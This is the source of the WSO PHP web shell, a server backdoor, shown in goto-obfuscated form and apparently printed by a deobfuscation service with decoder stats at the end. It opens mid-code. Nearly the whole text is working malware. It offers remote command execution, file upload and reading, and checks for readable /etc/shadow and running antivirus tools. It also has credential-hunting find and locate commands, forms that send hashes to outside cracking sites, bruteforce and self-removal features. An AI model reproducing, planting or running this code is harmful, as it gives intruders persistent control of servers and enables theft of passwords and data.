"; } } goto yuLqo; H4g4C: } goto GP22b; vzm5g: wsoSecParam("HDD space", wsoEx("df -h")); goto SphFn; j1mm2: $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); goto M0R0C; xDJbP: $temp = array(); goto pSd_M; pSd_M: foreach ($downloaders as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto AYbzB; nuthD: echo "<br>"; goto IArV4; GP22b: } goto QDcOt; yzksH: wsoSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); goto ledym; ESH98: wsoSecParam("OS version", @file_get_contents("/proc/version")); goto ZLZ7x; ZLZ7x: wsoSecParam("Distr name", @file_get_contents("/etc/issue.net")); goto Pr2du; ledym: wsoSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>" : "no"); goto ESH98; QDcOt: } else { goto NsBCo; Me9Q1: wsoSecParam("Account Settings", wsoEx("net accounts")); goto RXCoL; NsBCo: wsoSecParam("OS Version", wsoEx("ver")); goto Me9Q1; RXCoL: wsoSecParam("User Accounts", wsoEx("net user")); goto DnuxL; DnuxL: } goto IbU7m; wqp98: wsoHeader(); goto Kcf2h; aO8HS: if (function_exists("apache_get_modules")) { wsoSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } goto m3Zin; deosI: function wsoSecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "
") === false) { echo $v . "<br>"; } else { echo "<pre class=ml1>" . $v . "</pre>"; } } } goto zA3JJ; jAziO: } goto oHsYW; qljle: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= "/"; } goto j4eIF; g7ZCc: @ini_set("log_errors", 0); goto ABTpd; XeOpc: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto lUvYe; KC9ar: function actionStringTools() { goto MBvsT; S0req: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto nYBgB; Oymko: if (!function_exists("hex2ascii")) { function hex2ascii($p) { goto uM0Pu; NG1dD: return $r; goto fKGDN; uM0Pu: $r = ''; goto ac1Yo; ac1Yo: for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } goto NG1dD; fKGDN: } } goto ZMcUd; vUNKP: echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST["p1"]) ? '' : htmlspecialchars(@$_POST["p2"])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px' id='strOutput'>"; goto k5nqW; ZMcUd: if (!function_exists("ascii2hex")) { function ascii2hex($p) { goto cdb2T; O0tgA: for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("%02X", ord($p[$i])); } goto JVXpM; cdb2T: $r = ''; goto O0tgA; JVXpM: return strtoupper($r); goto I6jbu; I6jbu: } } goto q2kmv; HYxD9: echo "<h1>String conversions</h1><div class=content>"; goto OX44o; awjDW: function wsoRecursiveGlob($path) { goto TkAHe; lEFZ5: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { wsoRecursiveGlob($item); } } else { if (empty($_POST["p2"]) || @strpos(file_get_contents($item), $_POST["p2"]) !== false) { echo "<a href='#' onclick='g("FilesTools",null,"" . urlencode($item) . "", "view","")'>" . htmlspecialchars($item) . "</a><br>"; } } } } goto fVCol; GUM3F: $paths = @array_unique(@array_merge(@glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR))); goto lEFZ5; TkAHe: if (substr($path, -1) != "/") { $path .= "/"; } goto GUM3F; fVCol: } goto qLbIZ; aUced: if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } goto Oymko; MBvsT: if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } goto aUced; q2kmv: if (!function_exists("full_urlencode")) { function full_urlencode($p) { goto d1_DN; d1_DN: $r = ''; goto D3iJl; YAXHC: return strtoupper($r); goto wfgBE; D3iJl: for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } goto YAXHC; wfgBE: } } goto IHtdM; N3xOi: if (isset($_POST["ajax"])) { goto V2x0a; Wm5Kx: exit; goto IafqZ; x5Jd7: if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } goto vD3zd; vD3zd: $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xd\x9\'\x0") . "';\xa"; goto NED_K; V2x0a: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto LTDt0; LTDt0: ob_start(); goto x5Jd7; NED_K: echo strlen($temp), "
", $temp; goto Wm5Kx; IafqZ: } goto S0req; nYBgB: wsoHeader(); goto HYxD9; k5nqW: if (!empty($_POST["p1"])) { if (in_array($_POST["p1"], $stringTools)) { echo htmlspecialchars($_POST["p1"]($_POST["p2"])); } } goto jZzWZ; OX44o: echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; goto BBAR5; Rfc53: wsoFooter(); goto JMM51; uWngZ: echo "</div><br><h1>Search for hash:</h1><div class=content>\xd\xa \x9<form method='post' target='_blank' name='hf'>
\xa \x9\x9<input type='text' name='hash' style='width:200px;'><br>\xd
<input type='hidden' name='act' value='find'/>
\x9 <input type='button' value='hashcracking.ru' onclick="document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()"><br>
\x9 <input type='button' value='md5.rednoize.com' onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
\xa <input type='button' value='crackfor.me' onclick="document.hf.action='http://crackfor.me/index.php';document.hf.submit()"><br>
\x9 </form></div>"; goto Rfc53; BBAR5: foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; } goto vUNKP; qLbIZ: if (@$_POST["p3"]) { wsoRecursiveGlob($_POST["c"]); } goto uWngZ; jZzWZ: echo "</pre></div><br><h1>Search files:</h1><div class=content>\xd
\x9 <form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>\xd
\x9<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\xd\xa\x9\x9 <tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS["cwd"]) . "' style='width:100%'></td></tr>\xd\xa <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
\xa\x9 <tr><td></td><td><input type='submit' value='>>'></td></tr>\xd\xa \x9 </table></form>"; goto awjDW; IHtdM: $stringTools = array("Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen"); goto N3xOi; JMM51: } goto xB4MH; sO9OV: $cwd = @getcwd(); goto cUzsD; SG2I5: function WSOstripslashes($array) { return is_array($array) ? array_map("WSOstripslashes", $array) : stripslashes($array); } goto M9YJl; EoPoZ: if ($os == "win") { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => '', "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => '', "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto MrsTM; Cjo7J: $color = "#df5"; goto LNmAT; ocXfq: $_COOKIE = WSOstripslashes($_COOKIE); goto Qn_9k; dPSqc: if (empty($_POST["a"])) { if (isset($default_action) && function_exists("action" . $default_action)) { $_POST["a"] = $default_action; } else { $_POST["a"] = "SecInfo"; } } goto j2Rfu; fj9OS: if ($argc == 3) { $_POST = unserialize(base64_decode($argv[1])); $_SERVER = unserialize(base64_decode($argv[2])); } goto GFRHq; MrsTM: function wsoHeader() { goto E9rcc; FKql5: echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" . ($GLOBALS["os"] == "win" ? "<br>Drives:" : '') . "</span></td>" . "<td><nobr>" . substr(@php_uname(), 0, 120) . " <a href="" . $explink . "" target=_blank>[exploit-db.com]</a></nobr><br>" . $uid . " ( " . $user . " ) <span>Group:</span> " . $gid . " ( " . $group . " )<br>" . @phpversion() . " <span>Safe mode:</span> " . ($GLOBALS["safe_mode"] ? "<font color=red>ON</font>" : "<font color=green><b>OFF</b></font>") . " <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . wsoViewSize($totalSpace) . " <span>Free:</span> " . wsoViewSize($freeSpace) . " (" . (int) ($freeSpace / $totalSpace * 100) . "%)<br>" . $cwd_links . " " . wsoPermsColor($GLOBALS["cwd"]) . " <a href=# onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . $drives . "</td>" . "<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">" . $opt_charsets . "</optgroup></select><br><span>Server IP:</span><br>" . @$_SERVER["SERVER_ADDR"] . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>" . $menu . "</tr></table><div style="margin:5">"; goto RzURU; M4wyI: $m = array("Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Sql" => "Sql", "Php" => "Php", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network"); goto JIPap; XR0lk: $totalSpace = $totalSpace ? $totalSpace : 1; goto gDdS4; QoI2U: $drives = ''; goto dJUUJ; E9rcc: if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["default_charset"]; } goto wwJNm; yWMQp: $charsets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); goto QAzn_; JIPap: if (!empty($GLOBALS["auth_pass"])) { $m["Logout"] = "Logout"; } goto hedz2; nmRB7: echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . "'><title>" . $_SERVER["HTTP_HOST"] . " - WSO " . WSO_VERSION . "</title>\xd
<style>
\xabody{background-color:#444;color:#e1e1e1;}
\xabody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\xd\xatable.info{ color:#fff;background-color:#222; }
\xaspan,h1,a{ color: {$color} !important; }\xd
span{ font-weight: bolder; }\xd
h1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\xd
div.content{ padding: 5px;margin-left:5px;background-color:#333; }\xd\xaa{ text-decoration:none; }\xd\xaa:hover{ text-decoration:underline; }
\xa.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }\xd\xainput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }\xd
form{ margin:0px; }
\xa#toolsTbl{ text-align:center; }
\xa.toolsInp{ width: 300px }
\xa.main th{text-align:left;background-color:#5e5e5e;}\xd\xa.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
\xa.l2{background-color:#333}\xd
pre{font-family:Courier,Monospace;}
</style>
\xa<script>
\xa var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';\xd\xa var a_ = '" . htmlspecialchars(@$_POST["a"]) . "'\xd
var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "';\xd
var p1_ = '" . (strpos(@$_POST["p1"], "
") !== false ? '' : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "';
var p2_ = '" . (strpos(@$_POST["p2"], "
") !== false ? '' : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "';\xd\xa var p3_ = '" . (strpos(@$_POST["p3"], "\xa") !== false ? '' : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "';
var d = document;\xd\xa\x9function set(a,c,p1,p2,p3,charset) {
\xa \x9if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\xd\xa if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
\xa \x9if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\xd
\x9if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
\xa\x9\x9if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\xd
}\xd\xa\x9function g(a,c,p1,p2,p3,charset) {
\x9 set(a,c,p1,p2,p3,charset);\xd\xa\x9 d.mf.submit();\xd
\x9}\xd
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);\xd\xa \x9var params = 'ajax=true';\xd\xa\x9\x9for(i=0;i<d.mf.elements.length;i++)
\xa\x9 \x9params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\xd
\x9\x9sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);
\xa\x9}\xd
\x9function sr(url, params) {\xd
\x9if (window.XMLHttpRequest)
\xa \x9 req = new XMLHttpRequest();\xd
\x9\x9else if (window.ActiveXObject)\xd\xa\x9\x9 req = new ActiveXObject('Microsoft.XMLHTTP');\xd
if (req) {\xd
req.onreadystatechange = processReqChange;\xd\xa req.open('POST', url, true);
\xa req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\xd\xa req.send(params);\xd
}
\xa }
\xa\x9function processReqChange() {
if( (req.readyState == 4) )
\xa \x9\x9if(req.status == 200) {\xd
\x9\x9var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');\xd
var arr=reg.exec(req.responseText);\xd
\x9 eval(arr[2].substr(0, arr[1]));\xd\xa\x9\x9\x9} else alert('Request error!');
\xa\x9}
</script>
\xa<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>\xd
<input type=hidden name=a>\xd
<input type=hidden name=c>\xd
<input type=hidden name=p1>
\xa<input type=hidden name=p2>\xd
<input type=hidden name=p3>
\xa<input type=hidden name=charset>\xd
</form>"; goto yrJci; HJ09z: $totalSpace = @disk_total_space($GLOBALS["cwd"]); goto XR0lk; mxXoN: $explink = "http://exploit-db.com/search/?action=search&filter_description="; goto CGFSE; jqLRT: $menu = ''; goto pyClH; znu8e: $kernel = @php_uname("s"); goto mxXoN; IUSK1: for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g("FilesMan",""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; } $cwd_links .= "")'>" . $path[$i] . "/</a>"; } goto yWMQp; QAzn_: $opt_charsets = ''; goto wJ6Eu; hedz2: $m["Self remove"] = "SelfRemove"; goto jqLRT; MFEdT: $n = count($path); goto IUSK1; PbU2y: $path = explode("/", $GLOBALS["cwd"]); goto MFEdT; CGFSE: if (strpos("Linux", $kernel) !== false) { $explink .= urlencode("Linux Kernel " . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . " " . substr($release, 0, 3)); } goto oXY47; yrJci: $freeSpace = @diskfreespace($GLOBALS["cwd"]); goto HJ09z; pyClH: foreach ($m as $k => $v) { $menu .= "<th width="" . (int) (100 / count($m)) . "%">[ <a href="#" onclick="g('" . $v . "',null,'','','')">" . $k . "</a> ]</th>"; } goto QoI2U; wJ6Eu: foreach ($charsets as $item) { $opt_charsets .= "<option value="" . $item . "" " . ($_POST["charset"] == $item ? "selected" : '') . ">" . $item . "</option>"; } goto M4wyI; dJUUJ: if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "<a href="#" onclick="g('FilesMan','" . $drive . ":/')">[ " . $drive . " ]</a> "; } } } goto FKql5; wwJNm: global $color; goto nmRB7; gDdS4: $release = @php_uname("r"); goto znu8e; oXY47: if (!function_exists("posix_getegid")) { goto VMtJd; VMtJd: $user = @get_current_user(); goto RNehq; RNehq: $uid = @getmyuid(); goto kWs3Y; n3X6Y: $group = "?"; goto dyMHz; kWs3Y: $gid = @getmygid(); goto n3X6Y; dyMHz: } else { goto ec83q; yJq0B: $uid = $uid["uid"]; goto nZ1Iw; nZ1Iw: $group = $gid["name"]; goto LgEQ1; LgEQ1: $gid = $gid["gid"]; goto XEe3x; q9aTZ: $user = $uid["name"]; goto yJq0B; ERGtZ: $gid = @posix_getgrgid(posix_getegid()); goto q9aTZ; ec83q: $uid = @posix_getpwuid(posix_geteuid()); goto ERGtZ; XEe3x: } goto HU3s7; HU3s7: $cwd_links = ''; goto PbU2y; RzURU: } goto pXSrD; lUvYe: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto d62j5; V8rDW: @set_time_limit(0); goto hd5Oa; KCE0z: function wsoWhich($p) { goto qE7x8; bvBsL: if (!empty($path)) { return $path; } goto A0ITv; qE7x8: $path = wsoEx("which " . $p); goto bvBsL; A0ITv: return false; goto xhdvj; xhdvj: } goto HhMRL; guAyk: function wsoScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto AwLVq; hfmSV: while (false !== ($filename = readdir($dh))) { $files[] = $filename; } goto Rc9At; Rc9At: return $files; goto dO6EV; AwLVq: $dh = opendir($dir); goto hfmSV; dO6EV: } } goto KCE0z; pXSrD: function wsoFooter() { $is_writable = is_writable($GLOBALS["cwd"]) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "\xd\xa</div>\xd
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\xd\xa\x9<tr>
\x9\x9<td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=submit value='>>'></form></td>
\xa \x9<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\xd
</tr><tr>
\xa\x9 <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
\xa\x9</tr><tr>\xd\xa <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
\xa <td><form method='post' ENCTYPE='multipart/form-data'>
\xa\x9\x9<input type=hidden name=a value='FilesMAn'>
\x9 <input type=hidden name=c value='" . $GLOBALS["cwd"] . "'>\xd
\x9 <input type=hidden name=p1 value='uploadFile'>\xd
\x9\x9<input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
\x9\x9<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
\x9</tr></table></div></body></html>"; } goto XeOpc; Qn_9k: function wsoLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } goto e2q7d; i6mTz: function actionSelfRemove() { goto KQZY3; trHKc: if ($_POST["p1"] != "yes") { wsoHeader(); } goto X7soZ; X7soZ: echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>"; goto tsvXj; KQZY3: if ($_POST["p1"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("Shell has been removed"); } else { echo "unlink error!"; } } goto trHKc; tsvXj: wsoFooter(); goto n3JxC; n3JxC: } goto DbGtY; TQr3j: if (!empty($auth_pass)) { if (isset($_POST["pass"]) && md5($_POST["pass"]) == $auth_pass) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $auth_pass) { wsoLogin(); } } goto tZUOM; e2q7d: function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto TQr3j; yXkOt: function wsoViewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto etiAC; Zxful: exit; ?>Function Calls
| None |
Stats
| MD5 | c5593ec8f9712c7edeab342f48de7da1 |
| Eval Count | 0 |
| Decode Time | 235 ms |